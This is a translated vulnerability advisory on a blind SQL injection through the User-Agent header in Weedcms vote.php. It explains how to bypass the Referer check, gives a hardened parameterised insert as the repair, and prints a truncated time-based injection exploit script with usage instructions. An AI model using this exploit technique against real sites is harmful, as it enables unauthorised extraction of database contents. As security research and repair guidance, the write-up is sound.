Blind injection vulnerability and repair in Weedcms v4.0-5.0

Source: Internet
Author: User

Blind SQL injection via USER_AGENT in Weedcms v4.0 sp1 through the latest 5.0 Lunar New Year edition

Program description: Weedcms is built on a PHP + MySQL architecture. Its content management model lets you define the content model after creating a channel, all of which is controlled from the backend, which is very convenient.

The template engine is the mature and stable Smarty engine, which makes creating a template interface easy. Both the front end and the back end use DIV + CSS layout, which is slightly faster than the traditional approach.

The JavaScript side uses the widely adopted jQuery framework, together with the jQuery-based XHEditor visual editor.

Path optimization is supported on Apache and IIS to make your website friendlier to search engines.

Single-page function: create pages such as an "About Us" or company introduction; you only need to add the data, and access permissions can be controlled.

The backend supports permission allocation to reduce the workload of administrators, and menu navigation can be customized.

Advertisements: HTML customization is supported, and ads can be sent to the page on which you want them displayed. Unlimited content classification is supported, and you can define your own content in detail.

A member group interface is provided to facilitate resource allocation and control. Online member activity is monitored in real time. Backend management operations are recorded in logs one by one. Multi-language package switching is supported.

Cause of the vulnerability: vote.php inserts the USER_AGENT header directly into the database without any filtering, which leads to INSERT-type SQL injection. Because no error message is returned, only blind injection is possible.

Vulnerability analysis: let's look at the vote.php code:

First, the program reads the action variable from GET; if action = ok, it processes the vote and calls the check_request() function to verify the request. Let's follow this function.

Find "maid/function.php", line 390.

We can see that only the REFERER is matched against a simple regular expression and compared with the HOST, so this check can be bypassed simply by forging the Referer header.

Then the program reads the vote_id variable. We can pass a non-existent ID so that the program logic is not interrupted in different target environments. Next we can see that $_SERVER['HTTP_USER_AGENT'] is read directly when the voting data is inserted; since the $_SERVER array is never protected by magic_quotes_gpc, this vulnerability is exploitable regardless of that setting. Finally, $db->insert() is called to write the data to the database. Let's look at this function to see whether there is any filtering.

Find: includes/class_db.php, line 20.

We can see that this function does not filter the incoming data at all. It only assembles a simple SQL statement from the supplied values and finally calls query() to execute it.
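To make the defect in insert() concrete, here is an editor-added PHP illustration (not Weedcms's own class_db.php) of the string-concatenation pattern the article describes next to a hardened equivalent that binds every value as a parameter. The connection DSN, credentials, the table name w_vote_log and its columns are assumptions for the example.

```php
<?php
// Editor-added illustration, not code from Weedcms. The DSN, credentials,
// table name and column names below are placeholders for the example.
$pdo = new PDO('mysql:host=localhost;dbname=weedcms', 'db_user', 'db_password');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares

// Vulnerable pattern, as the article describes for $db->insert(): values are
// concatenated straight into the SQL text, so a crafted User-Agent can break out
// of its quoted string and MySQL executes whatever follows it.
function insert_unsafe(PDO $pdo, string $table, array $row): int {
    $cols = implode(',', array_keys($row));
    $vals = "'" . implode("','", array_values($row)) . "'"; // no escaping at all
    return $pdo->exec("INSERT INTO $table ($cols) VALUES ($vals)");
}

// Hardened version: column names must come from an allow-list, and every value
// travels as a bound parameter, so user input can never alter the SQL structure.
function insert_safe(PDO $pdo, string $table, array $row, array $allowedCols): int {
    foreach (array_keys($row) as $col) {
        if (!in_array($col, $allowedCols, true)) {
            throw new InvalidArgumentException("unexpected column: $col");
        }
    }
    $cols  = implode(',', array_keys($row));
    $marks = implode(',', array_fill(0, count($row), '?'));
    $stmt  = $pdo->prepare("INSERT INTO $table ($cols) VALUES ($marks)");
    $stmt->execute(array_values($row));
    return $stmt->rowCount();
}

// Vote handler: the User-Agent is attacker-controlled and, as the article notes,
// magic_quotes_gpc never applied to $_SERVER, so nothing upstream protects it.
// Capping the length also keeps an oversized header from being stored verbatim.
$ua = substr($_SERVER['HTTP_USER_AGENT'] ?? '', 0, 255);
insert_safe($pdo, 'w_vote_log', [
    'ip'         => $_SERVER['REMOTE_ADDR'] ?? '',
    'user_agent' => $ua,
    'vote_id'    => (int)($_POST['vote_id'] ?? 0),
], ['ip', 'user_agent', 'vote_id']);
```

With bound parameters a User-Agent containing quotes or SQL keywords is stored as literal text, and a time-based probe in that header no longer delays the response.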

Vulnerability exploitation: usage is php yecao.php 127.0.0.1 80 / 2, with four parameters: target host, port, program path (beginning with /), and delay.

Code (as published; the listing is cut off in the source after the GetTxt() loop, so GetChr() and the remainder of the script are not shown):

```php
<?php
$port = 80;
if (trim($argv[1]) == "" || trim($argv[2]) == "" || trim($argv[3]) == "" || trim($argv[4]) == "") {
    echo "use: www.exp.com 80 /web/ 3   target host, port, program path (ending with /), delay. "
       . "Note: you need to know the table prefix; the default is w_. "
       . "For MySQL 5.0 or later you can use the database name to obtain the table prefix\n";
    exit();
}
$tlb_tag  = "w_";                      // table prefix
$host     = trim($argv[1]);
$port     = trim($argv[2]);
$path     = trim($argv[3]);
$tout     = trim($argv[4]);            // delay threshold in seconds
$fullpath = $path . "vote.php?action=ok";
$postdata = "vote_id=99999999999";     // non-existent ID, see analysis above

function getmicrotime() {
    list($usec, $sec) = explode(" ", microtime());
    return (float)$usec + (float)$sec;
}

// Sends one POST to vote.php with an optional extra header; returns true when
// a response containing a Date: header came back.
function DoGet($header = "", $data = "") {
    global $host, $port, $fullpath;
    $fp  = fsockopen($host, $port, $errno, $errstr, 30);
    $suc = false;
    if (!$fp) {
        echo "$errstr ($errno)<br/>\n";
        return false;
    }
    $out  = "POST $fullpath HTTP/1.1\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Referer: http://$host/vote.php\r\n";   // forged Referer to pass check_request()
    if ($header != "") {
        $out .= $header . "\r\n";
    }
    if ($data != "") {
        $out .= "Content-Length: " . strlen($data) . "\r\n";
    }
    $out .= "Connection: Close\r\n\r\n";
    $out .= $data;
    fwrite($fp, $out);
    while (!feof($fp)) {
        $line = fgets($fp, 128);
        if (strpos($line, "Date:") !== false) {
            $suc = true;
        }
    }
    fclose($fp);
    return $suc;
}

// Time-based length probe: $SQL is eval'd to build $header for each candidate
// length $i; a response slower than $tout means the guess was right.
function GetLen($ColName, $SQL) {
    global $tout, $tlb_tag, $postdata;
    for ($i = 1; $i <= 50; $i++) {
        eval($SQL);
        echo "Verification: $ColName field length $i ...\n";
        $starttime = getmicrotime();
        $rs = DoGet($header, $postdata);
        $endtime = getmicrotime();
        if ($endtime - $starttime >= $tout) {
            return $i;
        }
    }
    return false;
}

function GetTxt($ColName, $ColLen, $SQL) {
    $text = "";
    for ($i = 1; $i <= $ColLen; $i++) {
        $chr = GetChr($ColName, $i, $SQL);
        // echo "obtained: $ColName field number: " . $i . "
        // (source listing ends here; GetChr() and the rest are not included)
    }
}
```
